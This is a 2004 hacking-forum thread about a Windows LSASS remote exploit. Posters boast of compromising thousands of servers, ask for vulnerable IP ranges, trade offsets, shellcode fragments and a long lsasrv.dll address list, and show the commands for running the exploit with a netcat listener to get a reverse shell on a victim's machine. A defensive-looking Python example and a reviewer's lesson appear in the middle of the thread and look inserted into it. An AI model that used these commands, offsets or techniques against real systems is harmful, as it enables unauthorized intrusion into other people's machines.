F34R
Yeah, I got the same prob. nc is listening and the exploit seems to have worked, but I don't get a shell... it just keeps listening...
Any help, peeps?
blackP0ster
Sometimes I get the same "error". Maybe it's because of firewalls, but I don't know.

But it works, got some nice 100 Mbit boxes.

black
shiz
Stop calling each other n00bs, you bunch of arrogant fucks.
If you don't like this board, I suggest you leave and DIE...
Killaloop
Script kids and autohaxxer freaks, if you want to make some more admins mad, do it NOW. Captured the first worm for this exploit today at 4 am on 2 of my vulnerable test machines (5 hours ago). Didn't have the time to take a look at what exactly it does, but what I can tell is it fixes the vulnerability (Return 5).
It didn't listen on a port while it was running; more information when I'm back from work.


/edit
And it's fun to see you guys trying to hack... what most of you script kids with their autohaxxer produce is a bunch of sh*t. One trying to extract his rar archive opened up his unrarer 20 times, and much more of that fun. I love it.
How do I know some of them are from you? Well, using the modded hxdef that was ONLY posted on this board and not renaming the service or files (isplog.exe...)...
Yeah, some of you need files and scripts pre-done for everything... it's a shame.
z0mbi3
This thing is gr8.
Thanks to dr0zaxx & strasharo.
cracken
Killaloop
I agree with your statement..
All those who have an IQ >100 better not try hacking, because a brain and some skill are always required ;)

cya
shiz
What's your IQ then, cracken, when you aren't even able to use the proper character...
> means larger than...
I'm starting to grow a dislike for your attitude on this board. If you don't have anything useful to say, then please shut that trap and don't post at all.
Please work on it, I know you can do it.
mille
Anyone tested the exploit for XP?
If someone can download Service Pack 1 for Win XP .cn and post lsass.exe and lsasrv.dll here, I'll add more offsets. I'm waiting for you! (I have no bandwidth :( )
Btbw
Always get "null session failed"... I think it's very hard now to find a server which allows the null session :/
night^man
This sploit r0x
QuadMedic
This is a l33t and dangerous sploit... patch your servers, m8s.
Toilal
I recoded this exploit, added another shellcode (cmd.exe listening on port 4444) and made the shell spawn right in the exploit. It works on about 90% of vulnerable 2K servers (see DSScan.exe and xp2k_detect.exe in this forum).

Of course, the admin guys should patch...
DaClueless
QUOTE (Killaloop @ Apr 27 2004, 07:35 AM)
/edit
And it's fun to see you guys trying to hack... what most of you script kids with their autohaxxer produce is a bunch of sh*t. One trying to extract his rar archive opened up his unrarer 20 times, and much more of that fun.

I don't know if it's fun or scary, because a lot of the script kiddies get into trouble with hacking more than any other type of hacker.

Why?
    A few main reasons:
  • They don't have the skill to understand that they are JUMPING UP AND DOWN and YELLING, "I am a hacker... I live here, come arrest me now."
  • There's a lot of stuff that ISPs use now to detect hackers/worms <-- Jumping up and down
  • Script kiddies normally run for a long time, making it easier for the admin to see it <-- YELLING
  • Most script kiddies don't know how to work through a proxy <-- I live here
  • So in short, the POLICE love script kiddies <-- Come arrest me now
DarkAngel52457
Hmm, I scan and scan and scan and I find no vuln. I find many IPs with open port 139, and when I check the IPs with DSScan the result = vuln. Can someone tell me what kind of range is good?

Sorry for my bad English
qwerty_tr
Yep, lots of scans with no results. I can't even find any port 139 on EU ranges.

Can some1 give an exploitable example range?
WeeDMoNKeY
QUOTE (qwerty_tr @ Apr 28 2004, 12:49 AM)
Yep, lots of scans with no results. I can't even find any port 139 on EU ranges.

Can some1 give an exploitable example range?

Scan 65.200.192.16... it's exploitable :>>>>>>>> (connect to it via Explorer :>)

./JOKE (IF YOU DON'T GET IT, DON'T SCAN IT....)

Learn to find your own ranges. www.ipindex.de

tweakz20
I did a ping check; that IP is real... whois said it belonged to "UUNET Technologies, Inc."... I don't get the joke...? And giving out IPs is against the rules... for future reference.
Flowby
QUOTE (Toilal @ Apr 27 2004, 10:16 PM)
I recoded this exploit, added another shellcode (cmd.exe listening on port 4444) and made the shell spawn right in the exploit. It works on about 90% of vulnerable 2K servers (see DSScan.exe and xp2k_detect.exe in this forum).

Of course, the admin guys should patch...

Can you upload it here, please?
Flowby
OK, here is the lsass.exe from Service Pack 1.

This is not the exploit, this is the file for the offset.
Krogoth
My ISP has blocked port 139 since the Blaster worm incident. The other way round is to get a remote shell and execute from there to another box. I hope I'll be able to do that.

Thanks for compiling, Flowby, I'm going to test it.
qwerty_tr
Yo ppl,
when I try to sploit it over the LAN at school (I can find vuln. with DSScan),

after sploiting, my computer gives me a 60 sec reboot message. Any1 know why?

The boxes I am trying to sploit are XP EN and the box I am using is also XP EN.
Gurou
QUOTE (Toilal @ Apr 27 2004, 10:16 PM)
I recoded this exploit, added another shellcode (cmd.exe listening on port 4444) and made the shell spawn right in the exploit. It works on about 90% of vulnerable 2K servers (see DSScan.exe and xp2k_detect.exe in this forum).

Of course, the admin guys should patch...

post the code here ?
tolf
QUOTE (qwerty_tr @ Apr 28 2004, 07:11 AM)
Yo ppl,
when I try to sploit it over the LAN at school (I can find vuln. with DSScan),

after sploiting, my computer gives me a 60 sec reboot message. Any1 know why?

The boxes I am trying to sploit are XP EN and the box I am using is also XP EN.

Because the code is only for XP China, not EN...

It will only work properly for 2K SP4.

There's a local one here that works; try that by PS to the box or on your own.
Stephen79
Just a note to say that after Norton's defs were updated, the sbaanetapi.dll is not detected as a virus, so if you are using this, then you will need to allow it or disable "real time" protection.
qwerty_tr
Any1 know an offset for XP EN boxes for this exploit, or have a compiled exploit which can exploit XP EN boxes?

Thx
Flowby
So I can exchange the English offset for German XP if somebody wants??
PM me
shii
It only works for CHINESE boxes. I suggest all peepz in here read the programmer's notices... be smart, dudes.
Flowby
QUOTE (shii @ Apr 28 2004, 05:20 PM)
It only works for CHINESE boxes. I suggest all peepz in here read the programmer's notices... be smart, dudes.

Be smart, lol. It works only on Chinese because there is only a Chinese offset....

OK, this I found, but now I don't know which offset I am looking for??



--=[ lsasrv.dll ]=--

DsRolerDcAsDc 0x74590bd7
DsRolerDcAsReplica 0x745902c8
DsRolerDemoteDc 0x745904db
DsRolerGetDcOperationProgress 0x7458fe29
DsRolerGetDcOperationResults 0x7458fe80
LsaIAddNameToLogonSession 0x7452cb74
LsaIAllocateHeap 0x7456b925
LsaIAllocateHeapZero 0x7452388a
LsaIAuditAccountLogon 0x7456f009
LsaIAuditKdcEvent 0x7456eada
LsaIAuditKerberosLogon 0x7456ead1
LsaIAuditLogonUsingExplicitCreds 0x74542d7e
LsaIAuditNotifyPackageLoad 0x74533a8c
LsaIAuditPasswordAccessEvent 0x7456fa62
LsaIAuditSamEvent 0x7456f506
LsaICallPackage 0x74541b44
LsaICallPackageEx 0x74541b65
LsaICallPackagePassthrough 0x7456b98b
LsaICancelNotification 0x7456b82a
LsaIChangeSecretCipherKey 0x7457456e
LsaICryptProtectData 0x7459a8a1
LsaICryptUnprotectData 0x7459a9d4
LsaIDsNotifiedObjectChange 0x74575b40
LsaIEnumerateSecrets 0x745742db
LsaIEventNotify 0x7456b825
LsaIFilterSids 0x74576ca6
LsaIForestTrustFindMatch 0x74576ab7
LsaIFreeForestTrustInfo 0x7457ad3d
LsaIFreeHeap 0x74523809
LsaIFreeReturnBuffer 0x74541bcc
LsaIFree_LSAI_PRIVATE_DATA 0x7456fc23
LsaIFree_LSAI_SECRET_ENUM_BUFFER 0x7456fbdb
LsaIFree_LSAPR_ACCOUNT_ENUM_BUFFER 0x745367e1
LsaIFree_LSAPR_CR_CIPHER_VALUE 0x74544b1b
LsaIFree_LSAPR_POLICY_DOMAIN_INFORMATION 0x74536f17
LsaIFree_LSAPR_POLICY_INFORMATION 0x74543ad5
LsaIFree_LSAPR_PRIVILEGE_ENUM_BUFFER 0x7456fc31
LsaIFree_LSAPR_PRIVILEGE_SET 0x7456fc23
LsaIFree_LSAPR_REFERENCED_DOMAIN_LIST 0x7456fba6
LsaIFree_LSAPR_SR_SECURITY_DESCRIPTOR 0x7456fc0a
LsaIFree_LSAPR_TRANSLATED_NAMES 0x7456fb78
LsaIFree_LSAPR_TRANSLATED_SIDS 0x7456fb6a
LsaIFree_LSAPR_TRUSTED_DOMAIN_INFO 0x7456fb86
LsaIFree_LSAPR_TRUSTED_ENUM_BUFFER 0x7456fbbf
LsaIFree_LSAPR_TRUSTED_ENUM_BUFFER_EX 0x7456fbcd
LsaIFree_LSAPR_TRUST_INFORMATION 0x7453e2a5
LsaIFree_LSAPR_UNICODE_STRING 0x7456fc0a
LsaIFree_LSAPR_UNICODE_STRING_BUFFER 0x7456fb6a
LsaIFree_LSAP_SITENAME_INFO 0x7457b668
LsaIFree_LSAP_SITE_INFO 0x7457b5f1
LsaIFree_LSAP_SUBNET_INFO 0x7457b625
LsaIFree_LSAP_UPN_SUFFIXES 0x7457b5f1
LsaIFree_LSA_FOREST_TRUST_COLLISION_INFORMATION 0x74576afd
LsaIFree_LSA_FOREST_TRUST_INFORMATION 0x74576adf
LsaIGetBootOption 0x7457cbc3
LsaIGetCallInfo 0x74524d92
LsaIGetForestTrustInformation 0x7457e25b
LsaIGetLogonGuid 0x74542994
LsaIGetNbAndDnsDomainNames 0x74542d17
LsaIGetPrivateData 0x74581270
LsaIGetSerialNumberPolicy 0x7458157a
LsaIGetSerialNumberPolicy2 0x74581528
LsaIGetSiteName 0x7457bc2a
LsaIHealthCheck 0x745366d6
LsaIImpersonateClient 0x74523e18
LsaIInitializeWellKnownSids 0x7453c1a8
LsaIIsClassIdLsaClass 0x745827b8
LsaIIsDsPaused 0x7457b688
LsaIKerberosRegisterTrustNotification 0x74574aa3
LsaILookupWellKnownName 0x74583252
LsaINotifyChangeNotification 0x74537442
LsaINotifyNetlogonParametersChangeW 0x7457bc11
LsaINotifyPasswordChanged 0x745604bb
LsaIOpenPolicyTrusted 0x7452e950
LsaIQueryForestTrustInfo 0x7457b2be
LsaIQueryInformationPolicyTrusted 0x745342d1
LsaIQuerySiteInfo 0x7457be19
LsaIQuerySubnetInfo 0x7457bfb4
LsaIQueryUpnSuffixes 0x7457c226
LsaIRegisterNotification 0x74534303
LsaIRegisterPolicyChangeNotificationCallback 0x7452918a
LsaISafeMode 0x74533839
LsaISamIndicatedDsStarted 0x74582ca6
LsaISetBootOption 0x7457cab0
LsaISetClientDnsHostName 0x7457b698
LsaISetLogonGuidInLogonSession 0x7452ed64
LsaISetPrivateData 0x7458130c
LsaISetSerialNumberPolicy 0x74581509
LsaISetTimesSecret 0x74573cf2
LsaISetupWasRun 0x7453562f
LsaITestCall 0x74584cc8
LsaIUnregisterAllPolicyChangeNotificationCallback 0x74584613
LsaIUnregisterPolicyChangeNotificationCallback 0x745845be
LsaIUpdateForestTrustInformation 0x745809c7
LsaIWriteAuditEvent 0x74543a35
LsapAuOpenSam 0x7452b78d
LsapCheckBootMode 0x7453caf2
LsapDsDebugInitialize 0x7453383f
LsapDsInitializeDsStateInfo 0x74533aa6
LsapDsInitializePromoteInterface 0x74533b12
LsapInitLsa 0x745340a4
LsarAddPrivilegesToAccount 0x74585653
LsarClose 0x74522836
LsarCreateAccount 0x74584ced
LsarCreateSecret 0x7457403f
LsarCreateTrustedDomain 0x7457a6ae
LsarCreateTrustedDomainEx 0x7457a5d0
LsarDelete 0x74584cde
LsarEnumerateAccounts 0x7453578f
LsarEnumeratePrivileges 0x74585af7
LsarEnumeratePrivilegesAccount 0x74585641
LsarEnumerateTrustedDomains 0x7457a6dc
LsarEnumerateTrustedDomainsEx 0x7457aa35
LsarGetQuotasForAccount 0x74584e03
LsarGetSystemAccessAccount 0x7458567b
LsarLookupNames 0x745843aa
LsarLookupPrivilegeDisplayName 0x74585bde
LsarLookupPrivilegeName 0x74585b50
LsarLookupPrivilegeValue 0x74521c3a
LsarLookupSids 0x74586c5e
LsarLookupSids2 0x74544fd8
LsarOpenAccount 0x745376c8
LsarOpenPolicy 0x74543da2
LsarOpenPolicySce 0x745813c2
LsarOpenSecret 0x745443f6
LsarOpenTrustedDomain 0x74576bbf
LsarOpenTrustedDomainByName 0x74576a83
LsarQueryDomainInformationPolicy 0x7453794f
LsarQueryForestTrustInformation 0x7457ff98
LsarQueryInformationPolicy 0x7452360e
LsarQueryInfoTrustedDomain 0x74576ed6
LsarQuerySecret 0x74544723
LsarQuerySecurityObject 0x745876d1
LsarQueryTrustedDomainInfo 0x74588c53
LsarQueryTrustedDomainInfoByName 0x7457881c
LsarRemovePrivilegesFromAccount 0x74585665
LsarSetDomainInformationPolicy 0x74587356
LsarSetForestTrustInformation 0x74580150
LsarSetInformationPolicy 0x7453722a
LsarSetInformationTrustedDomain 0x745792c9
LsarSetQuotasForAccount 0x74584e13
LsarSetSecret 0x7454e3c0
LsarSetSecurityObject 0x7458788d
LsarSetSystemAccessAccount 0x745856bb
LsarSetTrustedDomainInfoByName 0x7457a454
ServiceInit 0x7453a373
shii
Hihi, indeed Flowby. If anyone got the US-UK international offset, he's welcome.
mille
QUOTE (shii @ Apr 28 2004, 05:36 PM)
Hihi, indeed Flowby. If anyone got the US-UK international offset, he's welcome.

If you can download Service Pack 1 for the Windows XP Chinese version and post lsass.exe and lsasrv.dll here, I can find a way to get more offsets.
You don't need to install it, just download it (about 120 MB) and extract the files.
I can't download it because I have a slow 56k connection...
morbido
Hmm, I'm having some error where I get no shell. I have tested it on about 20 IPs and I know at least 10 had shells, as my friend tested them after me and received a shell.

I'm not running a firewall or router.

I'm using the exact same files as my friend.

It doesn't say the null session failed.

All it says is

shellcode 112
some other shit

But I never get a shell.
I made my friend try to connect to my nc and he got in, so what's going on? I don't understand.

If anyone can help, contact me on MSN: demonkid1@hotmail.com
ScriptGod
QUOTE (qwerty_tr @ Apr 28 2004, 03:12 PM)
Any1 know an offset for XP EN boxes for this exploit, or have a compiled exploit which can exploit XP EN boxes?

Thx

I got universal offsets for Win2K German and English, but these values are not jmp esp, they are call edi in my own private exploits, so you cannot use them with the public exploits without modification.
totof
Check, there are the 2 files from SP1 Chinese XP:
IF you succeed, compile the new version and give it too. What do you do with that?
totof
SP1 Chinese XP:
and the lsass.dll
MxMx
This sploit is too great to share...
I've hacked over 3000 servers... still no virus for this sec. issue released, lol... can't be long now.
hifil0wlife
To all of you who say you got a private exploit: if you're not sharing, nobody cares.
ScriptGod
QUOTE (hifil0wlife @ Apr 28 2004, 08:44 PM)
To all of you who say you got a private exploit: if you're not sharing, nobody cares.

I don't share. But I gave a hint on how you can make it on your own. If you cannot do that, or you don't like to spend time developing such an exploit, it's better that you don't have such an exploit.
Flowby
Where is the hint!!
And why are you like that? We are here to help each other!! We all have a big count of posts, we are not newbs, so why can't you post the code of your working exploit???
Post the code!!!!!!!!!!!!!!!!!!!!!
ScriptGod
QUOTE (Flowby @ Apr 28 2004, 09:13 PM)
Where is the hint!!
And why are you like that? We are here to help each other!! We all have a big count of posts, we are not newbs, so why can't you post the code of your working exploit???
Post the code!!!!!!!!!!!!!!!!!!!!!

I cannot post the code atm because I don't want to support script kiddies... If I posted this code, all of you could hack all vuln XP/2K GER/ENG machines, and in this forum there are not only a few noobs, I think.

I haven't analyzed the exploits completely, but it looks like

memcpy(&sendbuf[1948], "\xb8\x44\xf8\xff\xff\x03\xc4\x81\xec\x00\x20\x00\x00\xff\xe0\x00", 16);

needs to be placed at a higher place in the buffer if you use call edi. call edi is ff d7, jmp edi is ff e7. These are other offsets. There are many more jmp/call edi offsets than jmp/call esp. Btw, call/jmp edi is only possible under 2K. Under XP you can only use the esp register, but this doesn't matter; there is a universal offset for German/English, maybe the same on other languages.
flashb4ck
Hm, I hate the autohaxx0rs which are used by all the kiddies...
Now I can see who is interested in the source and who only wants to own the boxes.

@ all kiddies

If u want to run this sploit successfully, 1st learn to understand the code.



P.S. This is the hardest sploit I've ever seen after DCOM ^^


gr€€tz fL4Shb4Ck
Killaloop
QUOTE (ScriptGod @ Apr 28 2004, 09:02 PM)
QUOTE (hifil0wlife @ Apr 28 2004, 08:44 PM)
To all of you who say you got a private exploit: if you're not sharing, nobody cares.

I don't share. But I gave a hint on how you can make it on your own. If you cannot do that, or you don't like to spend time developing such an exploit, it's better that you don't have such an exploit.

Well, exploiting XP has become useless, hasn't it?
When you exploit XP in the way the public exploit is written, you crash the RPC server and reboot the machine. This has happened to me... I patched my systems but didn't want to reboot, then someone exploited me and crashed my sys...
So now I'm patched and even a good XP exploit would be useless.
Or do you still have good results with the XP offsets?
BigOne
Thx for it.

Nice work!


greetz, BigOne
WeeDMoNKeY
QUOTE (tweakz20 @ Apr 28 2004, 01:12 AM)
I did a ping check; that IP is real... whois said it belonged to "UUNET Technologies, Inc."... I don't get the joke...? And giving out IPs is against the rules... for future reference.

It's to an fbi.gov site ;D lol :>
ScriptGod
QUOTE (Killaloop @ Apr 28 2004, 09:44 PM)
QUOTE (ScriptGod @ Apr 28 2004, 09:02 PM)
QUOTE (hifil0wlife @ Apr 28 2004, 08:44 PM)
To all of you who say you got a private exploit: if you're not sharing, nobody cares.

I don't share. But I gave a hint on how you can make it on your own. If you cannot do that, or you don't like to spend time developing such an exploit, it's better that you don't have such an exploit.

Well, exploiting XP has become useless, hasn't it?
When you exploit XP in the way the public exploit is written, you crash the RPC server and reboot the machine. This has happened to me... I patched my systems but didn't want to reboot, then someone exploited me and crashed my sys...
So now I'm patched and even a good XP exploit would be useless.
Or do you still have good results with the XP offsets?

XP uses ANSI instead of UNICODE strings. So the public ones I've seen do a conversion from a 1-byte to a 2-byte string, so they cannot have any effect on XP systems. In Windows, strings are terminated with a hex 0.

AB -- TO UNICODE --> A \x0 B \x0

If you read this as an ANSI string (under XP), the 0 character is found at the 2nd position, so there is only a string with one byte -> no buffer overflow, no exploiting, no crash.
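The encoding effect ScriptGod describes above, shown as an added Python example. This is not code from the thread or from any exploit discussed in it, and the function names (to_unicode, narrow_strlen, wide_strlen, measure, fits_in_buffer) are this example's own. It converts a narrow string to the 2-byte form, then measures the same buffer the way a narrow-string reader and a wide-string reader would, so you can see why any non-empty ASCII payload collapses to a one-byte string when the receiving side reads it narrow, and why a bounds check that measures with one reader while the copy uses the other compares the wrong number:

```python
# Added example: narrow (1-byte) vs. wide (2-byte UTF-16-LE) reads of one buffer.
# Function names are this example's own, not from any exploit or from Windows.


def to_unicode(s: str) -> bytes:
    """The "TO UNICODE" step: each ASCII character becomes a 2-byte unit,
    so "AB" becomes b"A\\x00B\\x00"."""
    return s.encode("utf-16-le")


def narrow_strlen(buf: bytes) -> int:
    """What a C-style narrow reader (strlen) sees: bytes up to the first NUL."""
    nul = buf.find(b"\x00")
    return len(buf) if nul < 0 else nul


def wide_strlen(buf: bytes) -> int:
    """What a wide reader (wcslen) sees: 2-byte units up to the first 2-byte NUL."""
    units = 0
    for i in range(0, len(buf) - 1, 2):
        if buf[i] == 0 and buf[i + 1] == 0:
            break
        units += 1
    return units


def measure(s: str) -> dict:
    """Encode s to the 2-byte form and report both readers' view of it."""
    wide = to_unicode(s)
    return {
        "wide_bytes": wide,
        "narrow_len": narrow_strlen(wide),   # 1 for any non-empty ASCII input
        "wide_len": wide_strlen(wide),       # the full character count
    }


def fits_in_buffer(s: str, buffer_size: int, check_with_narrow: bool) -> bool:
    """A bounds check that measures the wide buffer with a narrow reader while the
    copy that follows would move every byte of it. With check_with_narrow=True the
    check passes for any ASCII input, which is the width mismatch a reviewer should flag."""
    wide = to_unicode(s)
    measured = narrow_strlen(wide) if check_with_narrow else len(wide)
    return measured < buffer_size


if __name__ == "__main__":
    for sample in ("AB", "A" * 2000):         # constructed inputs
        r = measure(sample)
        print(len(sample), "chars ->", len(r["wide_bytes"]), "bytes;",
              "narrow reader sees", r["narrow_len"], "byte(s),",
              "wide reader sees", r["wide_len"], "unit(s)")
    print("narrow check lets a 2000-char payload into a 64-byte buffer:",
          fits_in_buffer("A" * 2000, 64, check_with_narrow=True))
```

The takeaway for anyone reviewing a parser or an RPC server: measure and copy with the same string width, and size the destination from the byte count of the buffer actually copied, not from the character count a different reader reports.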
Killaloop
QUOTE (ScriptGod @ Apr 28 2004, 11:38 PM)

If you read this as an ANSI string (under XP), the 0 character is found at the 2nd position, so there is only a string with one byte -> no buffer overflow, no exploiting, no crash.

I know the difference.
All I can tell is that I got crashed because of this exploit, and if you look at the board postings you will see that I'm not the only one.
DaClueless
QUOTE (ScriptGod @ Apr 28 2004, 09:29 PM)

I cannot post the code atm because I don't want to support script kiddies... If I posted this code, all of you could hack all vuln XP/2K GER/ENG machines, and in this forum there are not only a few noobs, I think.

I agree with ScriptGod.

Personally, I feel people who see how EVIL they can make an exploit and give it to the world should have the police give them a call. I am surprised a company who has taken damages from the exploit doesn't go after the person who made the MOD exploit.

I know, in a lot of countries it's illegal to make a binary used to get root access. Sometimes I am scared GovernmentSecurity.org will get into trouble for people posting stuff.

I know this will upset a lot of people, so I am sorry. But it hurts because it's the truth: GovernmentSecurity.org can get into trouble for things people post.

DaClueless

WeeDMoNKeY
QUOTE (DaClueless @ Apr 29 2004, 02:25 AM)
QUOTE (ScriptGod @ Apr 28 2004, 09:29 PM)

I cannot post the code atm because I don't want to support script kiddies... If I posted this code, all of you could hack all vuln XP/2K GER/ENG machines, and in this forum there are not only a few noobs, I think.

I agree with ScriptGod.

Personally, I feel people who see how EVIL they can make an exploit and give it to the world should have the police give them a call. I am surprised a company who has taken damages from the exploit doesn't go after the person who made the MOD exploit.

I know, in a lot of countries it's illegal to make a binary used to get root access. Sometimes I am scared GovernmentSecurity.org will get into trouble for people posting stuff.

I know this will upset a lot of people, so I am sorry. But it hurts because it's the truth: GovernmentSecurity.org can get into trouble for things people post.

DaClueless

Please never talk again in your life. Thanks.

Some people here actually have networks and businesses with multiple operating systems.

I myself look after 500+ computers on a network on a strong 100 Mbit backbone. If it wasn't for this site I wouldn't have run my patching program the second I saw how powerful it was (newest lsass exploit, since I have many WinNT SP4 machines running servers for me).

Then did a check of all machines and bandwidth.

Then again, there's little kids like you who cry and get scared because PEOPLE ARE TRYING TO PROTECT THEMSELVES. Btw, learn to read disclaimers.

"Governmentsecurity is not liable for the stuff posted on this site, or how it's used".

So if you're in some random country that disallows "hacking" (system security), you shouldn't be here.

And ScriptGod, good choice. These kiddies don't need offsets. They need diapers.

(I've found a universal offset, doing a bunch of stuff, no use to me, but good to know)
DaClueless
QUOTE (WeeDMoNKeY @ Apr 29 2004, 04:45 AM)
Please never talk again in your life. Thanks.

Some people here actually have networks and businesses with multiple operating systems.

I myself look after 500+ computers on a network on a strong 100 Mbit backbone. If it wasn't for this site I wouldn't have run my patching program the second I saw how powerful it was (newest lsass exploit, since I have many WinNT SP4 machines running servers for me).


Then again, there's little kids like you who cry and get scared because PEOPLE ARE TRYING TO PROTECT THEMSELVES. Btw, learn to read disclaimers.

"Governmentsecurity is not liable for the stuff posted on this site, or how it's used".

So if you're in some random country that disallows "hacking" (system security), you shouldn't be here.

And ScriptGod, good choice. These kiddies don't need offsets. They need diapers.

(I've found a universal offset, doing a bunch of stuff, no use to me, but good to know)

I feel I should have been more clear. After reading your post, I must have confused you.
  • I feel GovernmentSecurity.org is a good thing.
  • I feel it's good for people to post an exploit (source code version), so people like yourself and I see the problems and make sure the patching works OK.
  • I feel it's bad for people to post ways to make the exploit more EVIL. Most of the original exploit writers understand it's good to add a lot of limits to their full disclosure of the exploit.
  • I feel it is bad for people to make auto-hackers and give them to script kiddies, because they normally use them for EVIL instead of GOOD.
  • I feel it's only a matter of time before the GOV starts cracking down on authors of EVIL versions of the exploit and auto-hackers.
  • Also, I feel it's a matter of time before businesses will start going after authors of EVIL versions of the exploit and auto-hackers. The reason is simple: when a business loses money because of a hacker, sometimes they go after an easier target like the author rather than the hacker (more to show that they are doing things to stop hackers).
  • But these are just my feelings of what I feel will happen in the future.

Just because Governmentsecurity.org has a disclaimer doesn't stop a business who has not agreed to the disclaimer from going after them.

What I don't want to happen is GovernmentSecurity.org getting hurt because of something a member has done. Which I feel you agree with me about.
zombie
Are you sure it only works on Chinese Windows?
I have gotten a shell on 2 Danish boxes with this exploit.
c°h°
Mm, 4 me this exploit is unusable. I tested some IPs, but like someone before said, nc is still listening without spawning a shell.
Step 1:
C:\winnt\system32\nc -vv -l -p 500
listening on [any] 500 ...

Step 2:
lsass 0 "vuln ip" 500 "ip nc is listening"
shellcode size 316
Ret value = 1726

But nc is still listening...

OK, maybe some modified versions work, I dunno, but this one posted here doesn't work 4 me.


greetz ch
Invision Power Board © 2001-2005 Invision Power Services, Inc.